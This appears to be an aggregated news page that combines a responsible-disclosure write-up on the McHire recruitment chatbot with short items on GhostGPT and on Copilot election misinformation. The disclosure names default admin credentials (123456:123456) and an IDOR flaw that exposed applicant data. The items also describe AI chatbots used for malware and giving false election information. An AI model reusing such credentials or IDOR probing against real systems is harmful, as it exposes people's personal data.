Ian Carroll, Sam Curry / ian.sh
When applying for a job at McDonald's, over 90% of franchises use "Olivia," an AI-powered chatbot. We discovered a vulnerability that could allow an attacker to access more than 64 million job applications. This data includes applicants' names, resumes, email addresses, phone numbers, and personality test results.
McHire is the chatbot recruitment platform used by 90% of McDonald’s franchisees. Prospective employees chat with a bot named Olivia, created by a company called Paradox.ai, that collects their personal information, shift preferences, and administers personality tests. We noticed this after seeing complaints on Reddit of the bot responding with nonsensical answers.
During a cursory security review of a few hours, we identified two serious issues: the McHire administration interface for restaurant owners accepted the default credentials 123456:123456, and an insecure direct object reference (IDOR) on an internal API allowed us to access any contacts and chats we wanted. Together they allowed us and anyone else with a McHire account and access to any inbox to retrieve the personal data of more than 64 million applicants.
We disclosed this issue to Paradox.ai and McDonald’s at the same time.
06/30/2025 5:46PM ET: Disclosed to Paradox.ai and McDonald’s
06/30/2025 6:24PM ET: McDonald’s confirms receipt and requests technical details
06/30/2025 7:31PM ET: Credentials are no longer usable to access the app
07/01/2025 9:44PM ET: Followed up on status
07/01/2025 10:18PM ET: Paradox.ai confirms the issues have been resolved
Cybercriminals use GhostGPT, an uncensored AI chatbot, for malware creation, BEC scams, and more. Learn about the risks and how AI fights back.
#chatbot #creation #cybercriminals #fights #ghostgpt #learn #malware #risks #scams #uncensored
With less than a year to go before one of the most consequential elections in US history, Microsoft’s AI chatbot is responding to political queries with conspiracies, misinformation, and out-of-date or incorrect information.
When WIRED asked the chatbot, initially called Bing Chat and recently renamed Microsoft Copilot, about polling locations for the 2024 US election, the bot referenced in-person voting by linking to an article about Russian president Vladimir Putin running for reelection next year. When asked about electoral candidates, it listed numerous GOP candidates who have already pulled out of the race.